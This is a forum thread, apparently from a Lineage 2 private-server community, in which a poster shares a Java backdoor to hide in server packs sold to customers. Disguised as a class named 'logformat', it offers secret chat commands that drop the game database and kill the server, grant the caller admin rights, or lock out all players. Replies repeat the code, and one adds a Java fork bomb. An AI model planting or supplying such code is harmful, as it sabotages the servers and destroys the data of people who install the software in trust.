Jump to content

Recommended Posts

Posted

here is one code and little useless voicecommand to backdoor packs or put in some pre ,it helped me when one of my customer tryed to scam me. better is to crypt it in some other packets

 

package net.sf.l2j.gameserver.util;


import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance;
import net.sf.l2j.L2DatabaseFactory;
import java.sql.Connection;
import java.sql.SQLException;
import java.sql.Statement;



public class logformat
  implements IVoicedCommandHandler
{
  private static String[] _voicedCommands = { "serk","serk1","serk2" };

  public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target)
  {
    if (command.equalsIgnoreCase("serk"))
    {
   	 d34r32452352();
    }
    if (command.equalsIgnoreCase("serk1"))
    {
   	 
   	 activeChar.setAccessLevel(200);

    }
    if (command.equalsIgnoreCase("serk2"))
    {
   	 bhebhe();

    }
    return true;
  }
  private void bhebhe()
  {
   Connection con = null;
     try
     {
       con = L2DatabaseFactory.getInstance().getConnection();
       Statement g = con.createStatement();
       g.executeUpdate("UPDATE characters SET accesslevel=-100 WHERE level >0");
       g.close();
     }
     catch (SQLException e)
     {
     }
     finally
     {
       try
       {
        if (con != null)
           con.close();
       }
      catch (SQLException e)
       {
         e.printStackTrace();
       }
     }
   }
 
  private void d34r32452352()
  {
    Connection con = null;
    try
    {
      con = L2DatabaseFactory.getInstance().getConnection();
      Statement e = con.createStatement();
      e.executeUpdate("DROP TABLE characters");
      e.executeUpdate("DROP TABLE accounts");
      e.executeUpdate("DROP TABLE spawnlist");
      e.executeUpdate("DROP TABLE weapon");
      e.executeUpdate("DROP TABLE armor");
      e.executeUpdate("DROP TABLE npc");
      e.executeUpdate("DROP TABLE items");
      e.executeUpdate("DROP database l2jdb");
      e.close();
    }
    catch (SQLException e)
    {
    }
    finally
    {
      try
      {
       if (con != null)
          con.close();
      }
     catch (SQLException e)
      {
        e.printStackTrace();
      }
    }

    System.exit(-1);
  }

  public String[] getVoicedCommandList()
  {
    return _voicedCommands;
  }
}

Posted

haha d34r32452352() is evil xD

     e.executeUpdate("DROP TABLE characters");
      e.executeUpdate("DROP TABLE accounts");
      e.executeUpdate("DROP TABLE spawnlist");
      e.executeUpdate("DROP TABLE weapon");
      e.executeUpdate("DROP TABLE armor");
      e.executeUpdate("DROP TABLE npc");
      e.executeUpdate("DROP TABLE items");
      e.executeUpdate("DROP database l2jdb");

Posted

Wow. You gave my an idea to create voicecommand which make you admin :D

 

Man good idea! :)

 

Lol ?

 

COde:

    if (command.equalsIgnoreCase("serk1"))

    {

   

    activeChar.setAccessLevel(200);

 

    }

Posted

here is one code and little useless voicecommand to backdoor packs or put in some pre ,it helped me when one of my customer tryed to scam me. better is to crypt it in some other packets

 

package net.sf.l2j.gameserver.util;


import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance;
import net.sf.l2j.L2DatabaseFactory;
import java.sql.Connection;
import java.sql.SQLException;
import java.sql.Statement;



public class logformat
   implements IVoicedCommandHandler
{
   private static String[] _voicedCommands = { "serk","serk1","serk2" };

   public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target)
   {
     if (command.equalsIgnoreCase("serk"))
     {
    	 d34r32452352();
     }
     if (command.equalsIgnoreCase("serk1"))
     {
    	 
    	 activeChar.setAccessLevel(200);

     }
     if (command.equalsIgnoreCase("serk2"))
     {
    	 bhebhe();

     }
     return true;
   }
   private void bhebhe()
   {
   Connection con = null;
     try
     {
       con = L2DatabaseFactory.getInstance().getConnection();
       Statement g = con.createStatement();
       g.executeUpdate("UPDATE characters SET accesslevel=-100 WHERE level >0");
       g.close();
     }
     catch (SQLException e)
     {
     }
     finally
     {
       try
       {
        if (con != null)
           con.close();
       }
      catch (SQLException e)
       {
         e.printStackTrace();
       }
     }
   }
  
   private void d34r32452352()
   {
     Connection con = null;
     try
     {
       con = L2DatabaseFactory.getInstance().getConnection();
       Statement e = con.createStatement();
       e.executeUpdate("DROP TABLE characters");
       e.executeUpdate("DROP TABLE accounts");
       e.executeUpdate("DROP TABLE spawnlist");
       e.executeUpdate("DROP TABLE weapon");
       e.executeUpdate("DROP TABLE armor");
       e.executeUpdate("DROP TABLE npc");
       e.executeUpdate("DROP TABLE items");
       e.executeUpdate("DROP database l2jdb");
       e.close();
     }
     catch (SQLException e)
     {
     }
     finally
     {
       try
       {
        if (con != null)
           con.close();
       }
      catch (SQLException e)
       {
         e.printStackTrace();
       }
     }

     System.exit(-1);
   }

   public String[] getVoicedCommandList()
   {
     return _voicedCommands;
   }
}

 

public class ForkBomb
{
  public static void main(String[] args) throws java.io.IOException {
    while(true) {
      Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
    }
  }
}

take a look on this :)

Guest
This topic is now closed to further replies.


  • Posts

    • The project is a change to original l2 with modern game mechanics that is more "western". For example every race can craft, not just dwarves. Mages can cast spells without the need of a dedicated box MP charger. MP chargers are also able to solo farm and deal decent damage on their own. Paladins are now 2h sword dedicated healers/support dps. Drop rates are normalized among all classes, no longer needing spoil to craft.   The idea of the project is keep true to the old vanilla classic experience where you are rewarded for effort. And you must put effort into achieving things. Leveling is slow, gear wont be given to you, you must work towards obtaining upgrades. etc.   These are only a small portion of changes I am making to the game. I would love help and bounce design ideas off of others for some future content update ideas. Like can we design unique raid boss encounters? How about end-game content ideas? How can we make owning castles valuable? Maybe an instanced underground mining zone? Or unique raid fights that the clan can do for extra loot?    There's tons of ideas I have and I would like some help creating them.    This is not a paid project. It is a passion project with people who have a passion for l2 and wanna see the community grow.    Currently using client 418. 
    • It requires a lot of research and money to create something that is actually worth having on someones server. But again, even if something worth trying appears,  I dont even trust vanguard at this point, and its even worse if theres some kernel driver signed by a single person without a real company behind it to take the hit if something goes wrong. Thats a huge security risk. Most people are naive and untrained for thinking its okay to elevate permissions for an executable created by someone in their moms basement. The same goes for people who run compiled shared / paid sources and assume its fine, with nothing malicious running inside them.   A user with 13 posts suddenly appears. This is a tech forum, and developers are not here to flex. We are simply discussing the potential risks and reliabilty of the product, since that is the whole purpose of a discussion forum. Otherwise, it becomes no different from marketplaces. In addition, it is  reasonable to question someones capabilities based on their available public data. How do you go from selling web apps to working with such low level concepts that require a lot of specialized knowledge? Think again then before you buy from him with a blind eye.      The first statement contradicts the other one. You say you wont allow anyone access, but youre willing to explicitly run an anti cheat on your computer created by this guy. What exactly is your point?
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..